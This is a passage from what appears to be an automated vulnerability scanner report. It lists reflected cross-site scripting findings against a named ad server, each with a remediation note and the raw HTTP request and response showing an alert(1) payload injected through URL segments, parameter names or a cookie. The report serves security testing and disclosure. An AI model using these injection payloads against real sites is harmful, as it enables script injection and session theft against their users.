function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-90589744_1296080008","http://ad.doubleclick.net//q1.sarasota6090d'-alert(1)-'ded34823b00/be_life;net=q1;u=,q1-90589744_1296080008,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1

1.42. http://a.collective-media.net/cmadj/q1.sarasota/be_life [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a7d'-alert(1)-'66d2693fdac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.sarasota/be_lifeb6a7d'-alert(1)-'66d2693fdac HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:29 GMT
Content-Length: 7352
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-63453835_1296080009","http://ad.doubleclick.net//q1.sarasota/be_lifeb6a7d'-alert(1)-'66d2693fdac;net=q1;u=,q1-63453835_1296080009,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1.none_m;

1.43. http://a.collective-media.net/cmadj/q1.sarasota/be_life [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 874ab'-alert(1)-'5e7abddf639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.sarasota/be_life?874ab'-alert(1)-'5e7abddf639=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:26 GMT
Content-Length: 7355
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-87019992_1296080006","http://ad.doubleclick.net//q1.sarasota/be_life?874ab'-alert(1)-'5e7abddf639=1;net=q1;u=,q1-87019992_1296080006,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1.none_

1.44. http://a.collective-media.net/cmadj/q1.sarasota/be_life [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d88e2'-alert(1)-'47df55ff317 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.sarasota/be_life;sz=d88e2'-alert(1)-'47df55ff317 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:22 GMT
Content-Length: 7385
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.45. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 1]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d804c'-alert(1)-'c9cbebc020a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadjd804c'-alert(1)-'c9cbebc020a/q1.wgn/be_ros;sz=728x90;net=q1;ord=4273326; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:21 GMT
Content-Length: 7390
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-31485179_1296080001","http://ad.doubleclick.net/adjd804c'-alert(1)-'c9cbebc020a/q1.wgn/be_ros;net=q1;u=,q1-31485179_1296080001,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nurl;sz=728x

1.46. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 2]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5237'-alert(1)-'3e89e9874b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.wgna5237'-alert(1)-'3e89e9874b2/be_ros HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:19 GMT
Content-Length: 7346
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54961051_1296079999","http://ad.doubleclick.net//q1.wgna5237'-alert(1)-'3e89e9874b2/be_ros;net=q1;u=,q1-54961051_1296079999,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1.

1.47. http://a.collective-media.net/cmadj/q1.wgn/be_ros [REST URL parameter 3]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de5c4'-alert(1)-'1b2e38451cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.wgn/be_rosde5c4'-alert(1)-'1b2e38451cf HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:20 GMT
Content-Length: 7346
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-14749606_1296080000","http://ad.doubleclick.net//q1.wgn/be_rosde5c4'-alert(1)-'1b2e38451cf;net=q1;u=,q1-14749606_1296080000,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1.none_m;

1.48. http://a.collective-media.net/cmadj/q1.wgn/be_ros [name of an arbitrarily supplied request parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac70'-alert(1)-'cdc11188cc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.wgn/be_ros?aac70'-alert(1)-'cdc11188cc1=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:18 GMT
Content-Length: 7349
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-95129925_1296079998","http://ad.doubleclick.net//q1.wgn/be_ros?aac70'-alert(1)-'cdc11188cc1=1;net=q1;u=,q1-95129925_1296079998,11d765b6a10b1b3,none,q1.none_m-q1.polit_l-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=q1.none_

1.49. http://a.collective-media.net/cmadj/q1.wgn/be_ros [sz parameter]  previous  next


Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecdf0'-alert(1)-'0639dbddebe was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.wgn/be_ros;sz=ecdf0'-alert(1)-'0639dbddebe HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:15 GMT
Content-Length: 7379
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.50. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/atfaudience [cli cookie]  previous  next


Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/atfaudience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb190'%3balert(1)//a3c285c14f5 was submitted in the cli cookie. This input was echoed as fb190';alert(1)//a3c285c14f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/atfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3fb190'%3balert(1)//a3c285c14f5; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:18 GMT
Content-Length: 7122
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.51. http://a.collective-media.net/cmadj/iblocal.journalreg.midtownpress/btfaudience [cli cookie]  previous  next


Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.journalreg.midtownpress/btfaudience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68d8a'%3balert(1)//16057176784 was submitted in the cli cookie. This input was echoed as 68d8a';alert(1)//16057176784 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.journalreg.midtownpress/btfaudience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b368d8a'%3balert(1)//16057176784; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:22 GMT
Content-Length: 7122
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.52. http://a.collective-media.net/cmadj/iblocal.revinet.nyron/audience [cli cookie]  previous  next


Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.nyron/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44d4f'%3balert(1)//6cd4a13eb2 was submitted in the cli cookie. This input was echoed as 44d4f';alert(1)//6cd4a13eb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/iblocal.revinet.nyron/audience HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b344d4f'%3balert(1)//6cd4a13eb2; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:22 GMT
Content-Length: 7108
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.

1.53. http://a.collective-media.net/cmadj/q1.sarasota/be_life [cli cookie]  previous  next


Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.sarasota/be_life

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdbc0'%3balert(1)//1cf76f1f1f6 was submitted in the cli cookie. This input was echoed as cdbc0';alert(1)//1cf76f1f1f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.sarasota/be_life HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3cdbc0'%3balert(1)//1cf76f1f1f6; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:24 GMT
Content-Length: 7084
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-17056980_1296080004","http://ad.doubleclick.net//q1.sarasota/be_life;net=q1;u=,q1-17056980_1296080004,11d765b6a10b1b3cdbc0';alert(1)//1cf76f1f1f6,none,;;contx=none;dc=w;btg=?","0","0",false);</scr'+'ipt>

1.54. http://a.collective-media.net/cmadj/q1.wgn/be_ros [cli cookie]  previous


Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.wgn/be_ros

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779db'%3balert(1)//4e28a65708c was submitted in the cli cookie. This input was echoed as 779db';alert(1)//4e28a65708c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.


GET /cmadj/q1.wgn/be_ros HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; blue=1; apnx=1; qcms=1; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3779db'%3balert(1)//4e28a65708c; nadp=1; rdst4=1; rdst3=1; qcdp=1;


HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Wed, 26 Jan 2011 22:13:16 GMT
Content-Length: 7078
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-25060664_1296079996","http://ad.doubleclick.net//q1.wgn/be_ros;net=q1;u=,q1-25060664_1296079996,11d765b6a10b1b3779db';alert(1)//4e28a65708c,none,;;contx=none;dc=w;btg=?","0","0",false);</scr'+'ipt>

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 08:37:34 CST 2011.